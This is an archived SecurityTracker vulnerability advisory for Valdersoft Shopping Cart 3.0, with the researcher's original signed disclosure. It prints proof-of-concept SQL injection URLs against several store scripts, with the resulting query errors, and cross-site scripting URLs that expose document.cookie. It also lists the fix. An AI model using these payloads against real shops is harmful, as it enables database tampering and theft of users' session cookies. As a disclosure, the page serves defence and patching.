SecurityTracker.com Archives - Valdersoft Shopping Cart Input Validation Holes Permit SQL Injection and Cross-Site Scripting Attacks

	Keep Track of the Latest Vulnerabilities with SecurityTracker!

SecurityTracker
Archives

Sign Up

Instant Alerts

Buy our Premium Vulnerability Notification Service to receive customized, instant alerts

Affiliates

Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!

Partners

Become a Partner and License Our Database or Notification Service

Report a Bug

Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com

Category: Application (Commerce) > Valdersoft Shopping Cart

Vendors: Valdersoft

Valdersoft Shopping Cart Input Validation Holes Permit SQL Injection and Cross-Site Scripting Attacks

SecurityTracker Alert ID: 1013565

SecurityTracker URL: http://securitytracker.com/id?1013565

CVE Reference: CVE-2005-0907 , CVE-2005-0908 (Links to External Site)

Updated: Jul 7 2008

Original Entry Date: Mar 27 2005

Impact: Disclosure of authentication information, Disclosure of system information, Disclosure of user information, Execution of arbitrary code via network, Modification of authentication information, Modification of user information

Fix Available: Yes Exploit Included: Yes Vendor Confirmed: Yes

Version(s): 3.0

Description: Diabolic Crab reported some vulnerabilities in the Valdersoft Shopping Cart software. A remote user can inject SQL commands. A remote user can also conduct cross-site scripting attacks.

The 'category.php', 'item.php', 'index.php', and 'search_result.php' scripts do not properly validate user-supplied input in certain parameters. A remote user can supply a specially crafted parameter value to execute SQL commands on the underlying database.

Some demonstration exploit URLs are provided:

http://[target]/store/category.php?sid=CDFE279AC2AD08522DF1CF9B46475132&id='SQL_INJECTION

http://[target]/store/item.php?si d=CDFE279AC2AD08522DF1CF9B46475132&id='SQL_INJECTION

http://[target]/store/index.php?sid=CDFE279AC2AD08522DF1CF9B46475132〈='SQL_INJECTION

http://[target]/stor e/search_result.php?sid=&searchTopCategoryID=&searchQuery=
'SQL_INJECTION&sid=CDFE279AC2AD08522DF1CF9B46475132&currency=USD

http://[target]/store/search_result.php?si d=CDFE279AC2AD08522DF1CF9B4
6475132&searchTopCategoryID='SQL_INJECTION&searchQuery=&sid=CDFE279AC2
AD08522DF1CF9B46475132&currency=USD

Some scripts do not filter HTML code from user-supplied input before displaying the input. A remote user can create a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the Valdersoft Shopping Cart software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

Some demonstration exploit URLs are provided:

http://[target]/store/index.php?sid=CDFE279AC2AD08522DF1CF9B46475132&
lang=%22%3E%3Cscript%3Ealert(docum ent.cookie)%3C/script%3E

http://[target]/store/search_result.php?sid=CDFE279AC2AD08522DF1CF9B4
6475132&searchTopCategoryID=%22%3E%3Cscript%3Ealert(document.cookie)%3
C/script%3E&searchQuery=&sid=CDFE279AC2AD08522DF1CF9B46475132&currency
=USD

Impact: A remote user can execute SQL commands on the underlying database.

A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the Valdersoft Shopping Cart software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

Solution: The vendor has issued a fixed copy of version 3.0 as of March 30, 2005. Users of versions downloaded prior to that date should download a new copy.

[Editor's note: The fixed version has the same version number as the vulnerable version.]

Vendor URL: www.valdersoft.com/valdersoft_shopping_cart.php (Links to External Site)

Cause: Input validation error

Underlying OS: Linux (Any), UNIX (Any), Windows (Any)

Reported By: "Dcrab" <dcrab@hackerscenter.com>

Message History: None.

Source Message Contents

Date: Sun, 27 Mar 2005 01:01:48 +0530
From: "Dcrab" <dcrab@hackerscenter.com>
Subject: Multiple sql injection, and xss vulnerabilities in Vladersoft Shopping Cart v.3.0

 
 
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
 
Dcrab 's Security Advisory
http://icis.digitalparadox.org/~dcrab
http://www.hackerscenter.com/
 
Severity:  High
Title: Multiple sql injection, and xss vulnerabilities in Vladersoft
Shopping Cart v.3.0
Date: March  27,  2005
 
Summary:
There are multiple sql injection, xss vulnerabilities in the
Vladersoft Shopping Cart v.3.0.
 
Proof of Concept Exploits:
http://localhost/store/category.php?sid=CDFE279AC2AD08522DF1CF9B464751
32&id='SQL_INJECTION
 
Query: "SELECT * FROM categories WHERE CategoryID = ''SQL_INJECTION'"
 
Error 1064: You have an error in your SQL syntax near
'SQL_INJECTION'' at line 1
 
 
http://localhost/store/item.php?sid=CDFE279AC2AD08522DF1CF9B46475132&i
d='SQL_INJECTION
 
Query: "SELECT * FROM options WHERE OptionItemID = ''SQL_INJECTION'
ORDER BY OptionPrice ASC"
 
Error 1064: You have an error in your SQL syntax near 'SQL_INJECTION'
ORDER BY OptionPrice ASC' at line 1
 
 
http://localhost/store/index.php?sid=CDFE279AC2AD08522DF1CF9B46475132&
lang='SQL_INJECTION
 
Query: "SELECT CategoryID AS bookmarkID, CategoryName'SQL_INJECTION
AS bookmarkName FROM categories WHERE CategoryID = '0'"
 
Error 1064: You have an error in your SQL syntax near '0'' at line 1
 
 
http://localhost/store/search_result.php?sid=&searchTopCategoryID=&sea
rchQuery='SQL_INJECTION&sid=CDFE279AC2AD08522DF1CF9B46475132&currency=
USD
 
Query: "SELECT COUNT(*) FROM items AS I, categories AS C,
categories_items AS CI WHERE CI.ItemID = I.ItemID AND CI.CategoryID =
 
C.CategoryID AND I.ItemStatus = '1' AND I.ItemIndexedWords LIKE
'%'SQL_INJECTION%'"
 
Error 1064: You have an error in your SQL syntax near
'SQL_INJECTION%'' at line 8
 
 
http://localhost/store/search_result.php?sid=CDFE279AC2AD08522DF1CF9B4
6475132&searchTopCategoryID='SQL_INJECTION&searchQuery=&sid=CDFE279AC2
AD08522DF1CF9B46475132&currency=USD
 
Query: "SELECT COUNT(*) FROM items AS I, categories AS C,
categories_items AS CI WHERE CI.ItemID = I.ItemID AND CI.CategoryID =
 
C.CategoryID AND I.ItemStatus = '1' AND I.ItemIndexedWords LIKE '%%'
AND CI.CategoryID = ''SQL_INJECTION'"
 
Error 1064: You have an error in your SQL syntax near
'SQL_INJECTION'' at line 8
 
 
http://localhost/store/index.php?sid=CDFE279AC2AD08522DF1CF9B46475132&
lang=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
 
Pops cookie
 
http://localhost/store/search_result.php?sid=CDFE279AC2AD08522DF1CF9B4
6475132&searchTopCategoryID=%22%3E%3Cscript%3Ealert(document.cookie)%3
C/script%3E&searchQuery=&sid=CDFE279AC2AD08522DF1CF9B46475132&currency
=USD
 
Pops cookie
 
Possible fix: The usage of htmlspeacialchars(),
mysql_escape_string(), mysql_real_escape_string() and other functions
for input validation before passing
 
user input to the mysql database, or before echoing data on the
screen, would solve these problems.
 
Author:
These vulnerabilties have been found and released by Diabolic Crab,
Email: dcrab[AT|NOSPAM]hackersenter[DOT|NOSPAM]com, please feel free
to
 
contact me regarding these vulnerabilities. You can find me at,
http://www.hackerscenter.com or
http://icis.digitalparadox.org/~dcrab. Lookout for my
 
soon to come out book on Secure coding with php.
 
-----BEGIN PGP SIGNATURE-----
Version: PGP 8.1 - not licensed for commercial use: www.pgp.com
 
iQA/AwUBQkW2cSZV5e8av/DUEQIUIACffDh1klYSnd341ufoxoc/CzzN7dAAoNM1
8uH3AXjs6wo8uufYacolkSTZ
=dA+E
-----END PGP SIGNATURE-----

Go to the Top of This SecurityTracker Archive Page

Home | View Topics | Search | Contact Us | Help
Copyright 2007, SecurityGlobal.net LLC